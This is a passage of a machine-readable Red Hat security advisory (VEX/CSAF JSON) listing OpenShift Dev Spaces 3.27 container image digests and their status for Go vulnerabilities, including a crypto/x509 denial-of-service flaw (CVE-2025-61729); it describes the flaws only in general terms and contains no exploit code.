"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: archive/zip: Excessive CPU consumption when building archive index in archive/zip"
},
{
"cve": "CVE-2025-61729",
"cwe": {
"id": "CWE-1050",
"name": "Excessive Platform Resource Consumption within a Loop"
},
"discovery_date": "2025-12-02T20:01:45.330964+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2418462"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in golang. A remote attacker could exploit this vulnerability by providing a specially crafted certificate during the error string construction process within the `HostnameError.Error()` function. This flaw, caused by unbounded string concatenation, leads to excessive resource consumption. Successful exploitation can result in a denial of service (DoS) for the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/x509: golang: Denial of Service due to excessive resource consumption via crafted certificate",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
],
"known_not_affected": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
